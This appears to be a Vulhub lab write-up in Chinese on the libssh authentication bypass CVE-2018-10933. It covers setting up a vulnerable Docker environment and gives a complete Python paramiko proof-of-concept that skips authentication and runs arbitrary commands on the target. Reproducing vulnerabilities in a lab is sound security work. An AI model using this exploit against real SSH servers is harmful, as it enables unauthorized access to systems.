libssh 服務端權限認證繞過漏洞(CVE-2018-10933)
libssh是一個提供ssh相關接口的開源庫,包含服務端、客戶端等。其服務端代碼中存在一處邏輯錯誤,攻擊者可以在認證成功前發送MSG_USERAUTH_SUCCESS消息,繞過認證過程,未授權訪問目標SSH服務器。
參考資料:
- https://www.libssh.org/security/advisories/CVE-2018-10933.txt
- https://www.seebug.org/vuldb/ssvid-97614
漏洞環境
執行如下命令啟動存在漏洞的環境:
docker-compose up -d
環境啟動后,我們可以連接your-ip:2222端口(賬號密碼:myuser:mypassword),這是一個合法的ssh流程:

漏洞復現
參考 https://www.seebug.org/vuldb/ssvid-97614 中給出的POC,我們編寫一個簡單的漏洞復現腳本:
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048
def execute(hostname, port, command):
sock = socket.socket()
try:
sock.connect((hostname, int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
client = transport.open_session(timeout=10)
client.exec_command(command)
# stdin = client.makefile("wb", bufsize)
stdout = client.makefile("rb", bufsize)
stderr = client.makefile_stderr("rb", bufsize)
output = stdout.read()
error = stderr.read()
stdout.close()
stderr.close()
return (output+error).decode()
except paramiko.SSHException as e:
logging.exception(e)
logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
except socket.error:
logging.debug("Unable to connect.")
return None
if __name__ == '__main__':
print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))
使用python3執行,即可在目標服務器上執行任意命令:

Vulhub 文檔
推薦文章: